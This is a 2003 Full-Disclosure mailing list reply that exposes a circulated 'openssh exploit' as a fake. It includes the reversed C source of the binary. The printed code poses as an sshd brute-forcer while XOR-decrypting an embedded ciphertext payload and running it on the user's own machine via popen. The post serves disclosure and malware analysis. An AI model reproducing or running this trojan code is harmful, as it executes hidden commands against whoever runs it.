[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*
- To: Vitaly Osipov <vosipov@xxxxxxxxxx>
- Subject: Re: [Full-Disclosure] Re: new openssh exploit in the wild! * is FAKE AS SH@!*
- From: Lars Olsson <jlo@xxxxxxxxxxxx>
- Date: Fri, 19 Sep 2003 09:07:32 +0200 (CEST)
On Fri, 19 Sep 2003, Vitaly Osipov wrote:
> This means that the original poster (gordon last) made it up himself, because
> he is saying :
>
> >> > i looked at this piece of exploit... it is binary so i'am not sure if
> >> > this is a trojan or a backdoor or a virus. but i can't see anything
> >> > strange while sniffing the exploit traffic. and i got root on serveral
> >> > of my openbsd boxes with that. the bruteforcer seems to be very good.
>
> which is obviously not true. Btw as far as I understand, the troyan code is
> triggered when
> the "exploit" is run with the offset specified, and not in a "bruteforcing"
> mode.
>
The trojan seems to be triggered in both cases, providing that the
"bruteforcing" terminates. I haven't test run the code but I did a very
quick reverse of the binary. It connects to the remote sshd but only
sends the key used for descrmbling the trojan code while it pretends
to search for offsets.
/Lars
/* reversed C source of supposed ssh-exploit */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <time.h>
#include <stdio.h>
extern FILE *popen(const char *, const char *);
static char nop[] = { 0x90, 0 };
static char c[] = { /* ciphertext */
0x4c, 0x03, 0x06, 0x09, 0x4c, 0x20, 0x45, 0x17,
0x1f, 0x16, 0x52, 0x19, 0x78, 0x5d, 0x54, 0x5c,
0x54, 0x51, 0x10, 0x3a, 0x5d, 0x4b, 0x5c, 0x4a,
0x03, 0x4a, 0x6e, 0x48, 0x17, 0x0e, 0x47, 0x41,
0x1d, 0x3e, 0x47, 0x4b, 0x03, 0x11, 0x02, 0x0c,
0x70, 0x06, 0x17, 0x15, 0x12, 0x05, 0x18, 0x20,
0x02, 0x07, 0x0e, 0x0a, 0x41, 0x01, 0x73, 0x1e,
0x17, 0x55, 0x5f, 0x3d, 0x07, 0x31, 0x3b, 0x40,
0x08, 0x32, 0x39, 0x4e, 0x6b, 0x3f, 0x53, 0x52,
0x39, 0x45, 0x74, 0x73, 0x5f, 0x02, 0x3e, 0x4a,
0x2c, 0x65, 0x49, 0x54, 0x4a, 0x0c, 0x50, 0x29,
0x68, 0x61, 0x0f, 0x2a, 0x17, 0x2c, 0x30, 0x13,
0x3a, 0x56, 0x56, 0x55, 0x54, 0x50, 0x19, 0x30,
0x5d, 0x5d, 0x5f, 0x5c, 0x58, 0x1a, 0x3a, 0x50,
0x5e, 0x5c, 0x5f, 0x43, 0x03, 0x3e, 0x59, 0x44,
0x49, 0x00, 0x15, 0x40, 0x2f, 0x14, 0x0c, 0x07,
0x01, 0x0e, 0x54, 0x3b, 0x47, 0x4b, 0x15, 0x07,
0x08, 0x4d, 0x2f, 0x0e, 0x02, 0x05, 0x0a, 0x0f,
0x45, 0x69, 0x00, 0x44, 0x4b, 0x04, 0x41, 0x1d,
0x2f, 0x13, 0x09, 0x16, 0x4a, 0x4f, 0x57, 0x6d,
0x17, 0x5f, 0x05, 0x04, 0x15, 0x03, 0x2f, 0x02,
0x10, 0x05, 0x4a, 0x11, 0x42, 0x73, 0x14, 0x13,
0x02, 0x45, 0x4e, 0x46, 0x74, 0x04, 0x4b, 0x15,
0x0d, 0x00, 0x47, 0x6f, 0x10, 0x44, 0x49, 0x17,
0x0e, 0x4c, 0x74, 0x48, 0x4a, 0x15, 0x16, 0x09,
0x09, 0x2f, 0x0c, 0x0a, 0x09, 0x12, 0x0f, 0x7c,
0x68, 0x08, 0x17, 0x12, 0x16, 0x41, 0x1d, 0x3e,
0x47, 0x4b, 0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13,
0x09, 0x16, 0x5e, 0x41, 0x45, 0x69, 0x09, 0x00,
0x46, 0x4a, 0x09, 0x4c, 0x6d, 0x02, 0x44, 0x4b,
0x0b, 0x00, 0x4e, 0x65, 0x47, 0x0f, 0x08, 0x0a,
0x16, 0x4d, 0x5f, 0x0f, 0x0b, 0x15, 0x11, 0x12,
0x03, 0x2d, 0x02, 0x1c, 0x03, 0x06, 0x41, 0x40,
0x61, 0x13, 0x44, 0x1d, 0x18, 0x41, 0x1d, 0x3e,
0x47, 0x4b, 0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13,
0x09, 0x16, 0x5e, 0x02, 0x42, 0x74, 0x47, 0x4b,
0x12, 0x08, 0x11, 0x0c, 0x2e, 0x13, 0x09, 0x16,
0x45, 0x1d, 0x03, 0x2f, 0x12, 0x17, 0x14, 0x4a,
0x12, 0x41, 0x69, 0x09, 0x4b, 0x15, 0x00, 0x0f,
0x47, 0x6d, 0x06, 0x0d, 0x0a, 0x45, 0x4c, 0x45,
0x20, 0x08, 0x13, 0x08, 0x04, 0x06, 0x46, 0x40,
0x00, 0x09, 0x1e, 0x4b, 0x05, 0x46, 0x20, 0x0a,
0x54, 0x08, 0x0e, 0x04, 0x5a, 0x68, 0x06, 0x07,
0x0d, 0x25, 0x12, 0x56, 0x70, 0x02, 0x16, 0x0b,
0x04, 0x13, 0x48, 0x74, 0x49, 0x00, 0x03, 0x4c,
0x41, 0x05, 0x3e, 0x47, 0x4b, 0x02, 0x00, 0x17,
0x0c, 0x6e, 0x12, 0x08, 0x0a, 0x45, 0x5a, 0x03,
0x72, 0x0a, 0x44, 0x4b, 0x03, 0x41, 0x0c, 0x74,
0x0a, 0x14, 0x49, 0x4b, 0x15, 0x4e, 0x70, 0x5c,
0
};
static char s[] = "gdfea#"; /* key */
int
main(argc, argv)
int argc;
char **argv;
{
char *recvbuf, *sendbuf, *buf;
time_t initial_time, i;
int sockfd;
struct sockaddr_in addr;
int start, offset, j, len;
ssize_t rcvd;
FILE *(*popen_ptr)(const char *, const char *);
recvbuf = (char *)malloc(255); /* recvbuf = 0xffffffe8(%ebp) */
sendbuf = (char *)malloc(255); /* sendbuf = 0xffffffc8(%ebp) */
printf("theosshucksass.c - remote openssh buffer management sploit\n");
printf("by raazab/m0nkeyhack@xxxxxxxxxxxxx\n");
if (argc < 2) {
printf("usage: ./a.out <ip> [<offset>]\n\n");
printf("offset: no offset for bruteforce\n");
exit (0);
}
/* 0x80488a6 */
if (getuid() != 0) {
printf("\n sorry dude need root for rawip\n"); /* heh */
exit (0);
}
/* 0x80488d0 */
initial_time = time(NULL); /* initial_time = 0xffffffd0(%ebp) */
srand(initial_time);
printf("\nr00ting box...\n");
printf("\thost: %s\n", argv[1]);
printf("\toffset: %s\n\n", argv[2]); /* hmmm? */
j = 15; /* j = 0xffffffcc(%ebp) */
printf("[*] building socket\n");
sockfd = socket(AF_INET, SOCK_STREAM, 0); /* sockfd =
0xffffffec(%ebp) */
addr.sin_family = AF_INET; /* addr.sin_family = 0xfffffff0(%ebp) */
addr.sin_port = htons(22); /* addr.sin_port = 0xfffffff2(%ebp) */
addr.sin_addr.s_addr = inet_addr(argv[1]); /* addr.sin_addr =
0xfffffff4(%ebp) */
printf("[*] connecting to victim\n");
_reconnect:
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
printf("TERROR\n");
exit (0);
}
/* 0x80489e0 */
recv(sockfd, recvbuf, 255, 0);
printf("\tVictim: %s\n", recvbuf);
if (argv[2] == NULL) {
printf("[*] no offset given: brute force - this may take a few
minutes\n");
start = offset = brfrcffst(); /* start = 0xffffffd4(%ebp) */
/* offset = 0xffffffe0(%ebp) */
_retry:
j++;
printf("\tTrying 0x%x\t", offset);
fflush(stdout);
for (i = 0; i < j; i += 6) { /* i = 0xffffffdc(%ebp)
*/
if (write(sockfd, s, strlen(s) + 1) == 0) {
break;
}
/* 0x8048ab2 */
i = time(NULL);
for (;;) {
/* 8048ac3 */
rcvd = recv(sockfd, recvbuf, 255, MSG_WAITALL);
/* rcvd = 0xffffffd8(%ebp) */
if (rcvd > 0) {
break;
}
if ((time(NULL) - i) > 4 && (time(NULL) -
initial_time) > 41) {
break;
}
/* 0x8048b20 */
}
}
/* 0x8048b30 */
if (rcvd > 0 || (time(NULL) - initial_time) > 41) {
/* 0x8048b51 */
printf(":-)\n");
printf("[*] Gotcha!\n");
buf = (char *)malloc(15); /* buf
= 0xffffffc0(%ebp) */
sprintf(buf, "%x", offset);
} else {
/* 0x8048bb0 */
printf(":-/\n");
if (offset > start) {
printf("[*] reconnecting \n");
close(sockfd);
goto _reconnect;
} else {
offset += 4;
goto _retry;
}
}
}
/* 0x8048c00 */
printf ("[*] calculating nops\n");
popen_ptr = popen;
for (len = 0; len < strlen(recvbuf); len++) {
strcat(sendbuf, nop);
}
/* 0x8048c51 */
printf("[*] sending nops\n");
write(sockfd, sendbuf, len);
printf("[*] sending shellcode\n");
/* decrypt ciphertext via a simple xor algo */
for (i = 1, j = 0; j < sizeof(c); i++, j++) {
if (i >= sizeof(s)) {
i = 0;
}
c[j] ^= s[i];
}
/* 0x8048ce3 */
write(sockfd, (*popen_ptr)(c, "r"));
printf("[*] trying to spawn remote shell on port 31337\n");
write(sockfd, s, strlen(s));
printf("[*] closing socket\n\n");
close(sockfd);
printf("all seems fine... try to connect to port 31337 on %s\n",
argv[1]);
}
int
brfrcffst()
{
return (rand()<<2);
}